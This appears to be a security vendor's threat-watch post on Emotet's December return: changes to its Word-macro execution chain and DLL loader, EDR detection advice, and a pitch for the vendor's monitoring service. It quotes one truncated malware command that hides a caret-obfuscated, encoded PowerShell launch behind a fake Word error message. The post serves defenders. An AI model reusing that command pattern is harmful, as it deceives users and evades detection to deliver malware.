Threat Watch

Emotet Updates Prompt New Detection Strategies for Defenders

Recently, the prolific botnet Emotet has returned after a hiatus of several months.  Starting on Monday (Dec 21), Binary Defense observed Emotet spinning up massive spam campaigns using malicious Microsoft Word document files sent as attachments. While the document lure seemed visually similar to those used by Emotet in the past, both the document file and the loader code received some significant changes. First, in the VBA macro code in the document files, the typical execution flow has changed. Instead of launching PowerShell directly from the macro embedded in the document, the document macro will now pass execution to cmd in a new process, which will eventually open PowerShell with the following command, while using the msg.exe program to display a fake error message supposedly from Word:

cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD UwBlAHQAIAAoACcAVQAnACsAJwAyADYAcwBUACcAKQAgACAAKABbAFQAWQBwAGUAXQAoACIAewAzAH0Aew…

Additionally, the next big change to Emotet was in the loader. Instead of dropping an EXE file, Emotet’s newest loader is now a DLL, and contains a single exported function named RunDLL, which executes Emotet’s main code. 

These changes show that even though Emotet was not spamming during those long months, development activity was still occurring for this malware.


With these new changes, Binary Defense recommends using Endpoint Detection and Response (EDR) tools to watch for msg.exe execution that is spawned from cmd.exe and contains “Word experienced an error trying to open the file” in the command line. Additionally, through detection tests of our own, Binary Defense recommends monitoring EDR for rundll32.exe processes with command lines ending in “,RunDLL” or “,#1” , as these are the two ways that Emotet uses to run its DLL, but they seem to be more uncommon command line execution arguments in many enterprise environments. Additionally, Binary Defense recommends deploying a 24/7 SOC Monitoring solution, such as Binary Defense’s own Security Operations Task Force. Binary Defense’s Managed Detection and Response (MDR) endpoint software and service will detect unusual process trees such as cmd.exe spawning from Word, as well as suspicious PowerShell commands and many other aspects of Emotet’s execution.